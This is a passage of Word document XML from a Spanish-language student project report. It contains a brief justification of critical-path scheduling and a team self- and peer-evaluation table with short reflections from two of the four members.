    <w:p w:rsidR="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRPr="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRPr="00802C3A" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00802C3A">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Justificación: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRPr="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRPr="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002C4C69">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Poder implementar una ruta crítica es de gran ayuda dentro del desarrollo de proyectos ya que esta misma nos brinda que tipo de tareas se pueden desfasar y cuáles no tiene desfase de tiempo. Por otra parte nos ayuda a tener un control de las tareas más importantes dentro del proyecto. Por otra parte cabe mencionar que para poderlo aplicar hay que tener en cuenta varios aspectos, como son los tiempos, tareas importantes y las tareas de cierre.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C4C69" w:rsidRPr="002C4C69" w:rsidRDefault="002C4C69" w:rsidP="002C4C69">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B95CD1" w:rsidRDefault="00B95CD1" w:rsidP="002C4C69">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:sectPr w:rsidR="00B95CD1" w:rsidSect="002D6D25">
          <w:headerReference w:type="default" r:id="rId103"/>
          <w:footerReference w:type="default" r:id="rId104"/>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:top="1418" w:right="1701" w:bottom="1418" w:left="1701" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002336FB" w:rsidRPr="00890B46" w:rsidRDefault="002336FB" w:rsidP="002336FB">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00411995" w:rsidRDefault="00411995" w:rsidP="00411995">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc514520860"/>
      <w:r>
        <w:t>REFLEXIONES</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidR="002336FB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C2FF9" w:rsidRDefault="001C2FF9" w:rsidP="001C2FF9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablaconcuadrcula"/>
        <w:tblW w:w="9015" w:type="dxa"/>
        <w:tblInd w:w="-10" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="98" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5987"/>
        <w:gridCol w:w="533"/>
        <w:gridCol w:w="533"/>
        <w:gridCol w:w="533"/>
        <w:gridCol w:w="573"/>
        <w:gridCol w:w="856"/>
      </w:tblGrid>
      <w:tr w:rsidR="001C2FF9" w:rsidTr="00310E0A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5987" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="001C2FF9" w:rsidRDefault="001C2FF9" w:rsidP="005702EF">
            <w:r>
              <w:t>Integrantes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="533" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="001C2FF9" w:rsidRDefault="001C2FF9" w:rsidP="005702EF">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="533" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="001C2FF9" w:rsidRDefault="001C2FF9" w:rsidP="005702EF">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="533" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="001C2FF9" w:rsidRDefault="001C2FF9" w:rsidP="005702EF">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="573" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="001C2FF9" w:rsidRDefault="001C2FF9" w:rsidP="005702EF">
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="001C2FF9" w:rsidRDefault="001C2FF9" w:rsidP="005702EF">
            <w:r>
              <w:t>Total</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00310E0A" w:rsidTr="00310E0A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5987" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00310E0A">
            <w:r>
              <w:t>1.Mayrani Reyes Galán</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="533" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00890BA2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="533" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00890BA2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="533" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00890BA2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="573" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00890BA2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00890BA2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00310E0A" w:rsidTr="00310E0A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5987" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00310E0A">
            <w:r>
              <w:t xml:space="preserve">2.José Alfredo Armenta Blanco </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="533" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00890BA2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="533" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00890BA2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="533" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00890BA2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="573" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00890BA2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00890BA2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00BD51DE">
              <w:t>40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00310E0A" w:rsidTr="00310E0A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5987" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00310E0A">
            <w:r>
              <w:t>3. Erick Antonio Mejía Meza</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="533" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00890BA2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="533" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00890BA2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="533" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00890BA2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="573" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00890BA2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00890BA2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00BD51DE">
              <w:t>40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00310E0A" w:rsidTr="00310E0A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5987" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00310E0A">
            <w:r>
              <w:t>4. Andrés Moreno García</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="533" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00890BA2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="533" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00890BA2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="533" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00890BA2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="573" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00890BA2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="856" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:left w:w="98" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w:rsidR="00310E0A" w:rsidRDefault="00310E0A" w:rsidP="00890BA2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00BD51DE">
              <w:t>40</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001C2FF9" w:rsidRPr="001C2FF9" w:rsidRDefault="001C2FF9" w:rsidP="001C2FF9">
      <w:pPr>
        <w:rPr>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00411995" w:rsidRDefault="00411995" w:rsidP="00411995">
      <w:pPr>
        <w:pStyle w:val="Sinespaciado"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00411995" w:rsidRDefault="00411995" w:rsidP="00411995">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C4855">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Mayrani Reyes Galán</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0085090D" w:rsidRDefault="0085090D" w:rsidP="00411995">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRDefault="00742B07" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00742B07">
        <w:t>¿Por qué me auto-evaluó de esta forma?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRPr="00742B07" w:rsidRDefault="00742B07" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRDefault="00742B07" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00742B07">
        <w:t xml:space="preserve">Considero que mi participación en cuanto al desarrollo de esta actividad fue 100% dedicada para tener un buen desarrollo de </w:t>
      </w:r>
      <w:r w:rsidR="00E74383">
        <w:t>la misma.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRPr="00742B07" w:rsidRDefault="00742B07" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRDefault="00742B07" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00742B07">
        <w:t>¿Por qué co-evaluó a mis compañeros de esta forma?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRPr="00742B07" w:rsidRDefault="00742B07" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRPr="00742B07" w:rsidRDefault="00742B07" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00742B07">
        <w:t>Considero que la evaluación que les asigno a cada uno de m</w:t>
      </w:r>
      <w:r w:rsidR="00E74383">
        <w:t>is compañeros es de acuerdo al</w:t>
      </w:r>
      <w:r w:rsidRPr="00742B07">
        <w:t xml:space="preserve"> esfuerzo que tuvieron para desarrollar de la mejor manera esta actividad así como considero que desde el principio que se hicieron estos cambios todos tratamos de cumplir con lo que nos pide el sistema  y acoplarnos a esta nueva forma de trabajo de cada uno, por esa parte </w:t>
      </w:r>
      <w:r w:rsidR="00E74383" w:rsidRPr="00742B07">
        <w:t>consider</w:t>
      </w:r>
      <w:r w:rsidR="00E74383">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidRPr="00742B07">
        <w:t xml:space="preserve"> que tienen la calificación correcta que se les asigno.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRDefault="00742B07" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0085090D" w:rsidRPr="00890BF8" w:rsidRDefault="0085090D" w:rsidP="001358CD"/>
    <w:p w:rsidR="0085090D" w:rsidRPr="00890BF8" w:rsidRDefault="00A1160A" w:rsidP="00890BF8">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00302666" w:rsidRPr="000F3A6B" w:rsidRDefault="00302666" w:rsidP="00E162E1"/>
    <w:p w:rsidR="00A1160A" w:rsidRDefault="00A1160A" w:rsidP="00AB48BC">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRDefault="00742B07" w:rsidP="00AB48BC">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRPr="00AB48BC" w:rsidRDefault="00742B07" w:rsidP="00AB48BC">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00411995" w:rsidRDefault="0069251A" w:rsidP="00411995">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>José Alfredo Armenta Blanco</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRDefault="00742B07" w:rsidP="00411995">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="567"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRDefault="00742B07" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00742B07">
        <w:t>¿Por qué me auto-evaluó de esta forma?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRPr="00742B07" w:rsidRDefault="00742B07" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE3402" w:rsidRPr="00BE3402" w:rsidRDefault="00BE3402" w:rsidP="00BE3402">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BE3402">
        <w:t xml:space="preserve">Me auto-evaluó con esta calificación porque considero que cumplí con </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BE3402">
        <w:t xml:space="preserve">las </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BE3402">
        <w:t xml:space="preserve">actividades y tareas que me fueron asignadas con un 100% de </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00BE3402">
        <w:t>cumplimiento.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRPr="00742B07" w:rsidRDefault="00742B07" w:rsidP="00BE3402">
      <w:r w:rsidRPr="00BE3402">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00742B07" w:rsidRDefault="00742B07" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00742B07">
        <w:t>¿Por qué co-evaluó a mis compañeros de esta forma?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE3402" w:rsidRDefault="00BE3402" w:rsidP="00742B07">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="100" w:lineRule="atLeast"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
